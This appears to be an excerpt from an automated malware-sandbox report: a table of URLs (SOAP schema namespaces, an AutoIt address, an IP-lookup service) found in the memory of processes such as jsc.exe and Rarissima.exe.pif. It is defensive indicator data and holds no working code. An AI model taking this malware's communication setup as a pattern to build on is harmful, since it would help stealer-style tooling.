http://tempuri.org/Entity/Id19LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id23Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id17LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id15LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id9LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id19Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id13LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id7LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id11LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault	jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id17Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id1LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id5LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id20Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id3LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id15Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id13Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id4Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/(	jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id6Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.autoitscript.com/autoit3/J	Rarissima.exe.pif, 0000000A.00000000.1174784742.0000000000A19000.00000002.00000001.01000000.00000006.sdmp, Dici.tmp.0.dr, Rarissima.exe.pif.4.dr	false	high
https://api.ip.sb/ip	Rarissima.exe.pif, 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id23LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id7Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id21LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id11Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id9Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/(	jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id22Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id24Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id1Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	high
